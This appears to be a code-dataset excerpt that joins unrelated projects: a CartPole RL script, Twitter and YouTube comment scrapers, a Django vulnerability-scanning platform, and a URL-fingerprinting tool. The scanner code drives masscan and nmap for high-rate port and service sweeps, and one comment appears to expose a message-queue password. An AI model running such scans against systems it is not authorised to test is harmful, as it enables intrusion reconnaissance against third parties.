fc1 = tf.layers.dense(self.observation,hidden_size,activation=tf.nn.relu)
fc2 = tf.layers.dense(fc1, hidden_size, activation=tf.nn.relu)
d1 = tf.nn.dropout(fc2,0.8)
fc3 = tf.layers.dense(d1, hidden_size, activation=tf.nn.relu)
fc4 = tf.layers.dense(fc3, self.action_size, activation=None)
return fc4
def np_softmax(x):
'''
External softmax function for the network as I wasn't able to integrate
it directly into the model.
:param x: List of Numbers
[1,2,3]
:return: List of numbers after softmax
[0.09003057, 0.24472847, 0.66524096]
'''
return np.exp(x) / np.sum(np.exp(x),axis=0)
def main(args):
dict_args = vars(args)
# Let's define all of our variables
test_episodes = dict_args['test_episodes'] # Number of testing episodes
train_step = dict_args['train_step'] # Number of train episode
explore_proba_decay = dict_args['explore_proba'] # Explore decay rate, how fast we want the agent to switch
# from random to using the network. (explore_proba_decay ** steps)
# Bear in mind that using
# a small value may cause the model to never converge.
select_top_best = dict_args['select_top_best'] # Select the top k examples where the model did the best
sample = dict_args['sample'] # How much we want to sample in each train steps
epoch = 15 # Training the neural network on the data collected
curr_longest = 0 # sum of reward from best top k examples
# Initialize the OpenAI gym
env = gym.make('CartPole-v0')
act_space = env.action_space.n
ob_space = env.observation_space.shape[0]
observation = env.reset()
# Declare the deep neural network
net = RL(observation_size=ob_space, action_size=act_space)
output = net.network()
loss = tf.reduce_mean(tf.nn.softmax_cross_entropy_with_logits_v2(logits=output,
labels=net.labeled_moves))
optimizer = tf.train.AdamOptimizer(learning_rate=0.01).minimize(loss)
saver = tf.train.Saver()
with tf.Session() as sess:
sess.run(tf.global_variables_initializer())
for step in range(train_step):
data = []
labels = []
print('Step:', step)
# Play (N = sample) times and select the top k examples
for _ in range(sample):
done = False
total_reward = 0
one_datapoint = []
one_action = []
while done == False:
# Select between explore and use network by chance
val = random.uniform(0, 1)
if val < explore_proba_decay ** step:
act = env.action_space.sample()
elif val > explore_proba_decay ** step:
obs_reshaped = np.reshape(observation, (-1, ob_space))
final_layer = sess.run(output, feed_dict={net.observation: obs_reshaped})[0]
layer_score = np_softmax(final_layer)
act = np.argmax(layer_score)
# Ensure that the state BEFORE committing the action is saved
# rather than after
one_datapoint.append(observation)
observation, reward, done, info = env.step(act)
act_one_hot = np.zeros([act_space])
act_one_hot[act] = 1
one_action.append(act_one_hot)
total_reward += reward
if dict_args['watch_it_train'] == True:
env.render()
observation = env.reset()
data.append(one_datapoint)
labels.append(one_action)
data.sort(key=len)
labels.sort(key=len)
li_of_len = [len(x) for x in data[-select_top_best:]]
# If the top k selected isn't any better than the previous
# ones. We will omit it.
if sum(li_of_len) < curr_longest:
print("Long not found, Continue")
print("Top", select_top_best, "Examples", li_of_len)
continue
# Else if we found better performing data,
# we'll train it on the deep neural network
else:
print("Top", select_top_best, "Examples", li_of_len)
print(li_of_len)
curr_longest = sum(li_of_len)
training_data = []
training_label = []
for datas in data[-select_top_best:]:
training_data.extend(datas)
for label in labels[-select_top_best:]:
training_label.extend(label)
for _ in range(epoch):
a, c = sess.run([optimizer, loss], feed_dict={net.observation: training_data,
net.labeled_moves: training_label})
# Once we've completed our training, we can watch how it performs.
for i in range(test_episodes):
state = env.reset()
done = False
while done == False:
obs_reshaped = np.reshape(state, (-1, ob_space))
final_layer = sess.run(output, feed_dict={net.observation: obs_reshaped})[0]
layer_score = np_softmax(final_layer)
act = np.argmax(layer_score)
state, reward, done, info = env.step(act)
env.render()
saver.save(sess, 'model/RL')
if __name__ == '__main__':
parser = argparse.ArgumentParser('RL For Cartpole Game')
parser.add_argument('--watch_it_train',
type=bool,
default=False)
parser.add_argument('--explore_proba',
                        type=float,
default=0.98)
parser.add_argument('--train_step',
type=int,
default=100)
parser.add_argument('--test_episodes',
type=int,
default=20)
parser.add_argument('--select_top_best',
type=int,
default=3)
parser.add_argument('--sample',
type=int,
default=15)
args = parser.parse_args()
main(args)
``` |
{
"source": "5war00p/NLP-Code-Mixing",
"score": 3
} |
#### File: NLP-Code-Mixing/Twitter Extraction/scrap.py
```python
import os
import json
import requests
from dotenv import load_dotenv
load_dotenv()
# To set your environment variables in your terminal run the following line:
# export 'BEARER_TOKEN'='<your_bearer_token>'
bearer_token = os.getenv('TWITTER_API_KEY')
def getComments(tweets):
MAX_SEARCH_TWT_LIMIT = 700 #270
text = []
next_token = ''
count = 0
for index, tweet in enumerate(tweets):
if count == MAX_SEARCH_TWT_LIMIT:
break
while True:
if count == MAX_SEARCH_TWT_LIMIT:
break
if next_token != '':
url = f'https://api.twitter.com/2/tweets/search/recent?query=conversation_id:{tweet}&max_results=100&next_token={next_token}'
else:
url = f'https://api.twitter.com/2/tweets/search/recent?query=conversation_id:{tweet}&max_results=100'
try:
response = connect_to_endpoint(url)
except:
return text
print('tweet-{}_{}_{}'.format(index+1, tweet, next_token))
if 'data' in response:
for twt in response['data']:
text.append(twt['text'])
if 'meta' in response and 'next_token' in response['meta']:
next_token = response['meta']['next_token']
else:
next_token=''
break
count += 1
return text
def getTweetComments(data):
MAX_TWT_LOOKUP = 900
tweetIDs = {}
next_token = ''
window_count = 0
for user in data:
id = user["id"]
tweetIDs[id] = []
if window_count == MAX_TWT_LOOKUP:
break
while True:
if window_count == MAX_TWT_LOOKUP:
break
if next_token != '':
url = f'https://api.twitter.com/2/users/{id}/tweets?&max_results=100&pagination_token={next_token}'
else:
url = f'https://api.twitter.com/2/users/{id}/tweets?&max_results=100'
response = connect_to_endpoint(url)
window_count += 1
if 'data' in response:
tweetIDs[id].extend([twt['id'] for twt in response['data']])
if 'meta' in response and 'next_token' in response['meta']:
next_token = response['meta']['next_token']
else:
break
text = getComments(tweetIDs[id])
with open(user['username'] + '.txt', 'w', encoding='utf-8') as outfile:
for line in text:
outfile.write("%s\n" % line)
def getUserIDs(usernames):
usernames = f"usernames={usernames}"
url = "https://api.twitter.com/2/users/by?{}".format(usernames)
response = connect_to_endpoint(url)
return response['data']
def bearer_oauth(r):
"""
Method required by bearer token authentication.
"""
r.headers["Authorization"] = f"Bearer {bearer_token}"
r.headers["User-Agent"] = "v2UserLookupPython"
return r
def connect_to_endpoint(url):
response = requests.request("GET", url, auth=bearer_oauth,)
if response.status_code != 200:
raise Exception(
"Request returned an error: {} {}".format(
response.status_code, response.text
)
)
return response.json()
def main():
usernames = input('Enter username: ')
users = getUserIDs(usernames)
getTweetComments(users)
if __name__ == "__main__":
main()
```
#### File: NLP-Code-Mixing/Youtube Extraction/scrap.py
```python
import os
from dotenv import load_dotenv
import googleapiclient.discovery
load_dotenv()
os.environ["OAUTHLIB_INSECURE_TRANSPORT"] = "1"
api_service_name = "youtube"
api_version = "v3"
DEVELOPER_KEY = os.getenv('YOUTUBE_API_KEY')
YOUTUBE = googleapiclient.discovery.build(
api_service_name, api_version, developerKey = DEVELOPER_KEY)
MAX_COMMENT_RESULTS = 100
MAX_VIDEOS_RESULTS = 50
def reqPlaylistVideos(playlistId):
request = YOUTUBE.playlistItems().list(
part="contentDetails",
maxResults=MAX_VIDEOS_RESULTS,
playlistId=playlistId
)
response = request.execute()
videos = []
for item in response['items']:
videoId = item['contentDetails']['videoId']
videos.append(videoId)
return videos
def reqCommentThreads(videoId, pageToken=None):
request = YOUTUBE.commentThreads().list(
part="snippet,replies",
maxResults=MAX_COMMENT_RESULTS,
textFormat="plainText",
videoId=videoId,
pageToken = pageToken,
)
response = request.execute()
return response
def filterJSON(response):
items = response['items']
comments_data = []
for item in items:
try:
comment = item['snippet']['topLevelComment']['snippet']['textDisplay']
comment = comment.replace('\n', ' ')
comments_data.append(comment)
if 'replies' in item:
comment_replies= item['replies']['comments']
for reply in comment_replies:
comment_reply = reply['snippet']['textDisplay']
comment_reply = comment_reply.replace('\n', ' ')
comments_data.append(comment_reply)
except KeyError:
print('textDisplay Key not Found!!')
return comments_data
def byPlaylists(filename):
fd = open(filename + '.txt', 'r', encoding='utf-8')
playlistIDs = fd.readlines()
for index, playlistID in enumerate(playlistIDs):
finalData = []
playlistID = playlistID.replace('\n', '')
try:
videoIds = reqPlaylistVideos(playlistID)
for vID in videoIds:
try:
response = reqCommentThreads(vID)
data = filterJSON(response)
finalData.extend(data)
try:
totalPages = response['pageInfo']['totalResults']
for _ in range(totalPages):
if 'nextPageToken' not in response:
break
nextPageToken = response['nextPageToken']
try:
                                response = reqCommentThreads(vID, nextPageToken)
data = filterJSON(response)
finalData.extend(data)
except:
pass
except KeyError:
print('totalResults Key not Found!!')
except:
pass
print(f'playlist-{index+1}_{playlistID}')
except:
print(f'playlist-{index+1}_{playlistID}_skipped')
export(playlistID, finalData)
def export(fname, finalData):
with open(fname + '.txt', 'w', encoding='utf-8') as outfile:
for line in finalData:
outfile.write("%s\n" % line)
def main():
choice = int(input('''Wanna give videoID(0) or playlistID(1) or multiple-Playlists(2)?\nChoose either (0 or 1 or 2): '''))
Id = None
finalData = []
if choice == 1:
Id = input('Enter playListID: ')
videoIds = reqPlaylistVideos(Id)
for vID in videoIds:
try:
response = reqCommentThreads(vID)
data = filterJSON(response)
finalData.extend(data)
try:
totalPages = response['pageInfo']['totalResults']
for _ in range(totalPages):
if 'nextPageToken' not in response:
break
nextPageToken = response['nextPageToken']
try:
                            response = reqCommentThreads(vID, nextPageToken)
data = filterJSON(response)
finalData.extend(data)
except:
pass
except KeyError:
print('totalResults Key not Found!!')
print(f'playlist-{Id}_{vID}')
except:
pass
export(Id, finalData)
elif choice == 0:
Id = input('Enter videoID: ')
response = reqCommentThreads(Id)
data = filterJSON(response)
finalData.extend(data)
try:
totalPages = response['pageInfo']['totalResults']
for _ in range(totalPages):
if 'nextPageToken' not in response:
break
nextPageToken = response['nextPageToken']
try:
response = reqCommentThreads(Id, nextPageToken)
data = filterJSON(response)
finalData.extend(data)
except:
pass
except KeyError:
print('totalResults Key not Found!!')
export(Id, finalData)
elif choice == 2:
fname = input('Enter filename that contains all playlist IDs: ')
        byPlaylists(fname)  # byPlaylists writes its own output file per playlist
if __name__ == "__main__":
main()
``` |
{
"source": "5wimming/ase",
"score": 2
} |
#### File: ase/ASE/celery.py
```python
from __future__ import absolute_import, unicode_literals
import os
from celery import Celery, platforms
from django.conf import settings
# set the default Django settings module for the 'celery' program.
os.environ.setdefault('DJANGO_SETTINGS_MODULE', 'ASE.settings')
app = Celery('ASE', backend='redis://127.0.0.1:6379/0', broker='redis://127.0.0.1:6379/0') # amqp://asemq:Ase.mq.005 @127.0.0.1:5672/ase
# read the celery configuration from django's settings.py
app.config_from_object('django.conf:settings')
# auto-discover tasks from all registered django apps
app.autodiscover_tasks()
# an async task used for testing
@app.task(bind=True)
def debug_task(self):
print('Request: {0!r}'.format(self.request))
```
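The app above auto-discovers each Django app's `tasks.py`; the admin actions further down call e.g. `tasks.task_update_poc.delay(...)`. Those task bodies are not part of this excerpt, but a minimal sketch of what such a module could look like is:

```python
# StrategyModel/tasks.py -- illustrative sketch only; the real task bodies are not shown here.
from celery import shared_task

@shared_task
def task_update_poc(git_url):
    # fetch and register POC scripts from git_url, then clear the 'poc_update' flag in redis
    ...
```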
#### File: ase/StrategyModel/admin.py
```python
from django.http import StreamingHttpResponse, JsonResponse
from django.contrib import admin
from import_export import resources
from StrategyModel.models import VulnStrategy, NvdCve
from import_export.admin import ImportExportModelAdmin, ImportExportActionModelAdmin
from simpleui.admin import AjaxAdmin
from django_redis import get_redis_connection
from ASE import settings
import logging
from . import tasks
logger = logging.getLogger("mdjango")
conn_redis = get_redis_connection('default')
class VulnStrategyResource(resources.ModelResource):
class Meta:
model = VulnStrategy
class VulnStrategyAdmin(ImportExportActionModelAdmin, ImportExportModelAdmin, AjaxAdmin):
list_display = ('strategy_name', 'port', 'service_name', 'application', 'version', 'create_time') # list
search_fields = ('strategy_name', 'port', 'service_name', 'application')
list_filter = ('service_name', 'application', 'create_time')
resource_class = VulnStrategyResource
list_per_page = 20
actions = ['layer_update_poc']
def layer_update_poc(self, request, queryset):
git_url = request.POST['name']
if not git_url.startswith('https://api.github.com/repos'):
return JsonResponse(data={
'status': 'error',
'msg': 'url is illegal'
})
if conn_redis.get('poc_update') == b'True':
return JsonResponse(data={
'status': 'success',
'msg': 'Please wait a moment, updating...'
})
try:
conn_redis.set('poc_update', 'True')
conn_redis.expire('poc_update', 18000)
tasks.task_update_poc.delay(git_url)
except Exception as e:
logger.error('code 07100001 - {}'.format(e))
conn_redis.set('poc_update', 'False')
return JsonResponse(data={
'status': 'success',
'msg': 'updating now'
})
layer_update_poc.short_description = 'update poc'
layer_update_poc.type = 'success'
layer_update_poc.icon = 'el-icon-s-promotion'
layer_update_poc.layer = {
'title': 'confirm',
'tips': 'you can input the storage url of POC',
'confirm_button': 'submit',
'cancel_button': 'cancel',
'width': '40%',
'labelWidth': "80px",
'params': [{
'type': 'input',
'key': 'name',
'label': 'url',
'value': 'https://api.github.com/repos/5wimming/ASE/contents/StrategyTools',
'require': False
}]
}
class NvdCveAdmin(ImportExportActionModelAdmin, ImportExportModelAdmin, AjaxAdmin):
list_display = (
'application', 'vendor', 'cve_data_meta', 'base_score', 'version_start_including', 'version_end_including',
'mid_version') # list
search_fields = ('application', 'cve_data_meta', 'cpe23uri', 'version_start_including', 'version_end_including',
'mid_version')
list_filter = ('base_score',)
list_per_page = 20
def has_add_permission(self, request):
return False
def has_export_permission(self, request):
return False
actions = ['layer_update_cve', 'delete_all_cve']
def layer_update_cve(self, request, queryset):
nvd_url = request.POST['name']
if not nvd_url.startswith('https://nvd.nist.gov/feeds/json/'):
return JsonResponse(data={
'status': 'error',
'msg': 'nvd url is illegal'
})
if conn_redis.get('nvd_update') == b'True':
return JsonResponse(data={
'status': 'success',
'msg': 'Please wait a moment, updating...'
})
conn_redis.set('nvd_update', 'True')
conn_redis.expire('nvd_update', 18000)
try:
tasks.task_update_cve_info.delay(nvd_url)
except Exception as e:
logger.error('code 0725006 - {}'.format(e))
conn_redis.set('nvd_update', 'False')
return JsonResponse(data={
'status': 'success',
'msg': ' nvd updating now'
})
    layer_update_cve.short_description = 'update cve'
layer_update_cve.type = 'success'
layer_update_cve.icon = 'el-icon-s-promotion'
layer_update_cve.layer = {
'title': 'confirm',
'tips': 'you can input the storage url of nvd',
'confirm_button': 'submit',
'cancel_button': 'cancel',
'width': '40%',
'labelWidth': "80px",
'params': [{
'type': 'input',
'key': 'name',
'label': 'url',
'value': 'https://nvd.nist.gov/feeds/json/cve/1.1/nvdcve-1.1-2021.json.zip',
'require': False
}]
}
def delete_all_cve(self, request, queryset):
input_name = request.POST['name']
if input_name != 'delete all':
return JsonResponse(data={
'status': 'error',
'msg': ' input illegal'
})
if conn_redis.get('delete_all') != b'True':
tasks.task_delete_cve.delay()
return JsonResponse(data={
'status': 'success',
'msg': ' deleting now'
})
delete_all_cve.short_description = 'delete all'
delete_all_cve.type = 'update'
delete_all_cve.icon = 'el-icon-delete-solid'
delete_all_cve.layer = {
'title': 'confirm',
'tips': 'please input "delete all"',
'confirm_button': 'submit',
'cancel_button': 'cancel',
'width': '40%',
'labelWidth': "80px",
'params': [{
'type': 'input',
'key': 'name',
'label': 'input',
'require': True
}]
}
admin.site.register(VulnStrategy, VulnStrategyAdmin)
admin.site.register(NvdCve, NvdCveAdmin)
```
#### File: ase/StrategyModel/update_cve.py
```python
import zipfile
import json
import os
import csv
import requests
from ASE import settings
from StrategyModel.models import NvdCve
import logging
# cve_results = []
logger = logging.getLogger("mdjango")
def get_file_info(filepath, sql_dict):
if not filepath.endswith('/'):
filepath += '/'
result = []
for filename in os.listdir(filepath):
if filename.endswith('.zip'):
try:
zip_file = zipfile.ZipFile(filepath + filename)
for names in zip_file.namelist():
zip_file.extract(names, filepath)
zip_file.close()
except Exception as e:
logger.error('code 0701002 - {}'.format(e))
for filename in os.listdir(filepath):
if filename.endswith('.json'):
try:
with open(filepath + filename, 'r', encoding='utf-8') as fr:
cve_json = json.load(fr)
if cve_json:
get_cve_info(cve_json, sql_dict)
except Exception as e:
logger.error('code 0701003 - {}'.format(e))
logger.info('find {} cve json'.format(len(result)))
return result
def get_child(node, cve_data_meta, description_value, base_score, published_date, last_modified_date, sql_dict, cve_results):
cpe_match = node.get('cpe_match', [])
for cpe_dict in cpe_match:
cpe23uri = cpe_dict.get('cpe23Uri', '')
if not cpe23uri:
continue
cpe_info = cpe23uri.split(':')
vendor = cpe_info[3]
application = cpe_info[4]
mid_version = cpe_info[5]
version_start_including = cpe_dict.get('versionStartIncluding', '')
version_end_including = cpe_dict.get('versionEndIncluding', '')
dup_str = cve_data_meta + version_start_including + version_end_including + mid_version
if dup_str in sql_dict:
continue
sql_dict[dup_str] = 1
temp = [vendor, application, cve_data_meta, cpe23uri, str(version_start_including), str(version_end_including),
str(mid_version), str(base_score), description_value, published_date, last_modified_date]
cve_results.append(temp)
children = node.get('children', [])
for child in children:
try:
get_child(child, cve_data_meta, description_value, base_score, published_date, last_modified_date, sql_dict, cve_results)
except Exception as e:
logger.error('code 0704018 - {}'.format(e))
def get_cve_info(cve_data, sql_dict):
logger.info('get cve info')
cve_results = []
for cve_item in cve_data['CVE_Items']:
try:
cve_info = cve_item['cve']
cve_data_meta = cve_info['CVE_data_meta'].get('ID')
description_value = cve_info.get('description', {}).get('description_data', [{}])[0].get('value', '')
impact = cve_item.get('impact', {})
cvss = impact.get('baseMetricV3', impact.get('baseMetricV2', {}))
base_score = cvss.get('cvssV3', cvss.get('cvssV2', {})).get('baseScore', -1)
published_date = cve_item.get('publishedDate', '')
last_modified_date = cve_item.get('lastModifiedDate', '')
nodes = cve_item['configurations']['nodes']
if int(base_score) < settings.CVE_BASE_SCORE:
continue
for node in nodes:
get_child(node, cve_data_meta, description_value, base_score, published_date, last_modified_date,
sql_dict, cve_results)
except Exception as e:
logger.error('[error] : {} - {}'.format(e, cve_item))
if cve_results:
logger.info('insert cve into mysql')
for cve_result in cve_results:
try:
save_result = NvdCve(vendor=cve_result[0], application=cve_result[1], cve_data_meta=cve_result[2],
cpe23uri=cve_result[3], version_start_including=cve_result[4],
version_end_including=cve_result[5], mid_version=cve_result[6],
base_score=cve_result[7], description_value=cve_result[8],
published_date=cve_result[9], last_modified_date=cve_result[10])
save_result.save()
except Exception as e:
logger.error('code 0702008 - {}'.format(e))
logger.info('get {} cpe'.format(len(cve_results)))
def output_data():
data_title = ['vendor', 'application', 'cve_data_meta', 'cpe23uri', 'version_start_including',
'version_end_including', 'mid_version', 'base_score', 'description_value', 'published_date',
'last_modified_date']
with open('./result.csv', 'w', encoding='utf-8', newline='') as fw:
csv_w = csv.writer(fw)
csv_w.writerow(data_title)
# csv_w.writerow(cve_results)
def get_new_nvd(url, file_path):
request_headers = {
'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:60.0) Ase/20160606 Firefox/60.0',
'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8',
'Accept-Language': 'zh-CN,zh;q=0.9',
'Connection': 'close'
}
try:
r = requests.get(url, headers=request_headers, verify=False, timeout=100)
with open(file_path + url.split('/')[-1], "wb") as code:
code.write(r.content)
logger.info('download nvd success - {}'.format(url))
except Exception as e:
logger.error('code 0701001 - download nvd failed by {} - {}'.format(url, e))
def main(url, sql_dict):
file_path = os.path.join(settings.BASE_DIR, settings.NVD_JSON_PATH)
get_new_nvd(url, file_path)
try:
get_file_info(file_path, sql_dict)
except Exception as e:
logger.error('code 0704001 - {}'.format(e))
if __name__ == '__main__':
main('https://nvd.nist.gov/feeds/json/cve/1.1/nvdcve-1.1-2021.json.zip')
```
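The `cpe23Uri` strings parsed in `get_child` follow the colon-separated CPE 2.3 layout, so after `split(':')` index 3 is the vendor, 4 the product and 5 the version. For example (hypothetical entry):

```python
# Hypothetical cpe23Uri, shown only to illustrate the indices used in get_child().
cpe23uri = "cpe:2.3:a:apache:http_server:2.4.49:*:*:*:*:*:*:*"
cpe_info = cpe23uri.split(':')
print(cpe_info[3], cpe_info[4], cpe_info[5])  # apache http_server 2.4.49
```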
#### File: ase/TaskModel/masscan_task.py
```python
import random
import time
import masscan
import logging
logger = logging.getLogger("mdjango")
class IpMasscan:
def __init__(self, masscan_args='--wait 5 --rate 5000'):
self.masscan_args = masscan_args
self.masscan = masscan.PortScanner()
def port_scan(self, targets, port):
"""端口存活扫描
端口存活扫描
Args:
targets: ip数组.
port: 端口.
Returns:
无
"""
if len(targets) < 1:
return targets
targets1 = []
targets2 = []
for i, value in enumerate(targets):
targets1.append(value)
if (i + 1) % 1000 == 0:
targets2.append(targets1)
targets1 = []
if targets1:
targets2.append(targets1)
results = set()
for targets in targets2:
for i in range(2):
scan_result = {}
random.shuffle(targets)
target_str = ','.join(targets)
try:
scan_result = self.masscan.scan('"{}"'.format(target_str), ports=port,
arguments=self.masscan_args)
break
except Exception as e:
logger.error('{} --- {} --- {}'.format(e,
e.__traceback__.tb_lineno,
e.__traceback__.tb_frame.f_globals["__file__"]))
finally:
pass
scan_ips = scan_result.get('scan', {})
for ip, value in scan_ips.items():
port_state = value.get('tcp', {}).get(int(port), {}).get('state', '')
if 'open' in port_state:
results.add(ip)
time.sleep(0.1)
return list(results)
def ip_scan(self, targets, ports_str):
"""ip存活扫描
ip存活扫描
Args:
targets: ip.
ports_str: 端口数据
Returns:
无
"""
        # 40 default ports
ports = '21,22,23,25,53,80,110,111,123,135,139,143,161,443,445,993,995,1080,1433,1434,1723,3128,3389,4750,' \
'5900,8080,8081,9101,9080,18080,28080,37111,37112,37113,37114,37115,37116,37117,37118,37119'
if ports_str:
ports = ports_str
result_ip = set()
result_port = set()
for i in range(2):
try:
scan_result = self.masscan.scan('"{}"'.format(','.join(targets)),
ports=ports,
arguments=self.masscan_args)
scan_ips = scan_result.get('scan', {})
for ip, value in scan_ips.items():
logger.info('subtask masscan result: [{}] --- [{}]'.format(ip, value))
value_dict = value.get('tcp', {})
if len(value_dict.items()) > 50:
continue
result_ip.add(ip)
for port_temp in value_dict.keys():
result_port.add(port_temp)
time.sleep(1)
random.shuffle(targets)
except Exception as e:
logger.error('{} --- {} --- {}'.format(e,
e.__traceback__.tb_lineno,
e.__traceback__.tb_frame.f_globals["__file__"]))
finally:
pass
return list(result_ip), list(result_port)
if __name__ == '__main__':
my_scan = IpMasscan('--wait 15 --rate 10000')
print(my_scan.ip_scan(
'172.16.58.3,172.16.17.32,192.168.3.11,192.168.127.12,172.16.17.32,172.16.31.10,192.168.3.11,192.168.127.12,172.16.58.3,172.16.58.3,172.16.17.32,172.16.58.3,192.168.3.11,192.168.127.12,192.168.127.12,172.16.31.10,192.168.127.12,192.168.3.11,172.16.58.3,172.16.31.10,192.168.3.11,172.16.58.3,172.16.58.3,192.168.3.11,172.16.31.10,192.168.3.11,172.16.17.32,172.16.58.3,192.168.3.11,172.16.17.32,172.16.58.3'.split(
','),
'1-1024,1080,1433,1434,1723,3128,3389,4750,900,8080,8081,9101,9080'))
```
#### File: ase/TaskModel/nmap_task.py
```python
import nmap
def main(target_port, port_type='TCP'):
target = target_port.split(':')[0]
port = int(target_port.split(':')[1])
white_list = ["java-rmi", "Ftp", "Ssh", "Sftp", "Telnet", "Tftp", "Rpc", "Netbios", "Xmanager", "Xwin", "Ldap", "Rlogin", "SQL", "Oracle", "Rdp", "Remoteadmin", "X11", "TCP_Napster_directory_8888_primary", "DB2", "GaussDB", "essbase", "oracle-tns", "mysql", "sybase", "sybasedbsynch", "sybasesrvmon", "postgresql", "redis", "mongodb", "SAP HANA", "hbase", "HBase-managed", "Hive"]
white_list = [item.lower() for item in white_list]
port_type = 'TCP' if port_type.upper() not in ['TCP', 'UDP'] else port_type
result_data = {'ip': target, 'port': port, 'port_type': port_type}
nmap_scan = nmap.PortScanner()
nmap_args = '-sS -sV -sU -Pn --max-retries 3 --min-rtt-timeout 500ms --max-rtt-timeout 3000ms'
nmap_args += ' --initial-rtt-timeout 500ms --defeat-rst-ratelimit --min-rate 10000 --max-rate 15000'
try:
target = target.replace('"', '')
scan_result = nmap_scan.scan(hosts='"{}"'.format(target),
ports='{}:{}'.format('U' if port_type.upper() == 'UDP' else 'T', port),
arguments=nmap_args)
try:
port_info = scan_result['scan'].get(target, {})
except Exception as e:
domain_ip = list(scan_result['scan'].keys())[0]
port_info = scan_result['scan'].get(domain_ip, {})
result_data['hostname'] = str(port_info.get('hostnames', {}))
result_data['vendor'] = str(port_info.get('vendor', {}))
port_type_info = port_info.get(port_type.lower(), {}).get(port, {})
result_data['state'] = port_type_info.get('state', '')
if 'open' not in result_data['state']:
return None
result_data['version'] = port_type_info.get('version', '')
result_data['service_name'] = port_type_info.get('name', '')
result_data['application'] = port_type_info.get('product', '')
result_data['extra_info'] = port_type_info.get('extrainfo', '')
result_data['cpe'] = port_type_info.get('cpe', 'cpe:/n:unknown:unknown')
result_data['vendor'] = result_data['cpe'].split(':')[2]
application_temp = result_data['application'].lower()
if any(item in application_temp for item in white_list):
result_data['remarks'] = 'risk port'
else:
result_data['remarks'] = ''
return result_data
except Exception as e:
print(e)
pass
return None
if __name__ == '__main__':
# print(nmap.__version__)
print(main('www.baidu.com:443', port_type='TCP'))
``` |
{
"source": "5wimming/bert-webshell",
"score": 2
} |
#### File: 5wimming/bert-webshell/config.py
```python
import pathlib
import os
basedir = str(pathlib.Path(os.path.abspath(__file__)).parent.parent.parent)
class Config():
def __init__(self):
self.bert_config_file = './multilingual_L-12_H-768_A-12/bert_config.json'
self.vocab_file = './multilingual_L-12_H-768_A-12/vocab.txt'
self.data_dir = './data/'
# self.data_dir = '/Data/xiaobensuan/cnews/'
        self.output_dir = './output/'  # output directory for the fine-tuned model
self.init_checkpoint = './multilingual_L-12_H-768_A-12/bert_model.ckpt'
self.pb_model_dir ='./pb/'
self.train_checkpoint = './results'
self.do_lower_case = True
self.verbose_logging = False
self.master = None
self.version_2_with_negative = False
self.null_score_diff_threshold = 0.0
self.use_tpu = False
self.tpu_name = None
self.tpu_zone = None
self.gcp_project = None
self.num_tpu_cores = 8
self.task_name = 'domain'
self.gpu_memory_fraction = 0.8
self.max_seq_length = 150
self.doc_stride = 128
self.max_query_length = 64
self.do_train = True
self.do_predict = False
self.do_eval = True
self.batch_size = 20
self.learning_rate = 5e-5
self.num_train_epochs = 3.0
self.warmup_proportion = 0.1
self.save_checkpoints_steps = 100
self.iterations_per_loop = 1000
self.n_best_size = 20
self.max_answer_length = 30
``` |
{
"source": "5wimming/url-fingerprint",
"score": 2
} |
#### File: 5wimming/url-fingerprint/thread_main.py
```python
import os
import time
import queue
import logging
import requests
import threading
import pandas as pd
import datetime
import csv
from Wappalyzer import Wappalyzer
# import the task module that will be invoked
import task
# logging configuration
log_format = '[%(asctime)s]-[%(levelname)s] - %(message)s'
time_format = '%Y-%m-%d %H:%M:%S'
logging.basicConfig(
level=logging.INFO,
format=log_format,
datefmt=time_format,
filename=time.strftime('task.log'),
filemode='a'
)
# also send log output to the console
console = logging.StreamHandler()
console.setLevel(logging.INFO)
console.setFormatter(logging.Formatter(log_format, time_format))
logging.getLogger('').addHandler(console)
# thread lock
thread_mutex = threading.Lock()
# number of worker threads
thread_max = 5
# input data file
input_file = 'input_url.txt'
# login account and password
url_account = '5wimming'
url_password = '<PASSWORD>'
# refresh the login cookie automatically after this many results
auto_refresh_cookie = 5000
body_save_path = './output/'
wappalyzer = Wappalyzer.latest().categories
csv_columns = ['url', 'status', 'headers', 'body length', 'body url nums', 'redirect url', 'title'] \
+ list(map(lambda key: wappalyzer[key]['name'], wappalyzer))
def get_url_cookie():
global cookie
cookie = 'RememberMe=5wimming;'
return cookie
def output_mkdir(path):
path = path.strip()
if not os.path.exists(path):
os.makedirs(path)
def thread_process_func(task_queue, result_queue):
global cookie
output_mkdir(body_save_path)
while True:
try:
try:
target = task_queue.get_nowait()
except queue.Empty:
logging.info('{} Task done'.format(threading.current_thread().name))
result_queue.put_nowait('Task done')
break
logging.info('[{}] - {}'.format(task_queue.qsize(), target))
            # call the task handler and push its result to result_queue
result = task.main(target, cookie, csv_columns)
result_queue.put_nowait(result)
except Exception as e:
logging.error('{} - {}'.format(threading.current_thread().name, e))
def save_csv(result):
result = list(map(list, zip(*result)))
columns = ['url', 'headers', 'body length', 'body url nums', 'redirect url', 'title']
db = pd.DataFrame([], columns=columns)
for i, value in enumerate(result):
db[columns[i]] = value
db.to_csv('urlInfo_' + datetime.datetime.now().strftime('%Y%m%d%H%M') + '.csv', na_rep='NA', index=0)
def thread_result_func(result_queue, output_file):
thread_done_total = 0
result_total = 0
try:
fw = open(output_file, 'w', encoding='utf-8', newline="")
# with open(output_file, 'w', encoding='UTF-8') as fw:
csv_writer = csv.writer(fw)
csv_writer.writerow(csv_columns)
while True:
try:
result = result_queue.get()
result_total += 1
if not result_total % auto_refresh_cookie:
get_url_cookie()
if result == 'Task done':
thread_done_total += 1
if thread_done_total == thread_max:
break
else:
continue
csv_writer.writerow(result)
except Exception as e:
logging.error('{} - {}'.format(threading.current_thread().name, e))
except Exception as e:
logging.error('{} - {}'.format(threading.current_thread().name, e))
finally:
fw.close()
def main():
logging.info('-' * 50)
if not os.path.exists(input_file):
logging.error('Not found input file: {}'.format(input_file))
logging.info('-' * 50)
exit(0)
logging.info('Read data')
with open(input_file, encoding='UTF-8') as fr:
input_data = fr.readlines()
logging.info('Create queue')
task_queue = queue.Queue()
for data in input_data:
task_queue.put_nowait(data.strip())
result_queue = queue.Queue()
thread_list = list()
    # get the login cookie
    get_url_cookie()
    # task worker threads
logging.info('Create thread')
for x in range(thread_max):
thread = threading.Thread(target=thread_process_func, args=(task_queue, result_queue))
thread.start()
thread_list.append(thread)
    # result writer thread
output_file = time.strftime('result_data_%Y%m%d%H%M%S.csv')
result_thread = threading.Thread(target=thread_result_func, args=(result_queue, output_file), name='Result Thread')
result_thread.start()
for thread in thread_list:
thread.join()
result_thread.join()
